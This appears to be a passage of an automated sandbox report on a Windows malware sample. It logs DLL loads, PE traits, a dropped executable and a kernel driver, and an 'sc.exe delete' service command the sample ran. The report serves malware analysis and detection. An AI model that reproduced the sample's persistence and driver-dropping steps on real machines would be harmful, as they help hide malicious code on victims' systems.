Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: gq83mrprwy.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: gq83mrprwy.exe

Static file information: File size 2653184 > 1048576

Source: gq83mrprwy.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x27d600

Source: gq83mrprwy.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: vefyedjsvjut.exe, 0000001C.00000003.1948571755.00000204887F0000.00000004.00000001.00020000.00000000.sdmp

Source: gq83mrprwy.exe	Static PE information: section name: .00cfg
Source: vefyedjsvjut.exe.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\gq83mrprwy.exe	Code function: 0_2_00007FF7970C1394 push qword ptr [00007FF7970CB004h]; ret	0_2_00007FF7970C1403
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Code function: 28_2_00007FF74F581394 push qword ptr [00007FF74F58B004h]; ret	28_2_00007FF74F581403
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_0000000140001394 push qword ptr [0000000140009004h]; ret	40_2_0000000140001403

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe

File created: C:\Windows\TEMP\zadejssjsckf.sys

Jump to behavior

Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	File created: C:\Windows\Temp\zadejssjsckf.sys			Jump to dropped file
Source: C:\Users\user\Desktop\gq83mrprwy.exe	File created: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe			Jump to dropped file

Source: C:\Users\user\Desktop\gq83mrprwy.exe

File created: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe

Jump to dropped file

Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe

File created: C:\Windows\Temp\zadejssjsckf.sys

Jump to dropped file

Source: C:\Users\user\Desktop\gq83mrprwy.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CENLNOGJ"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
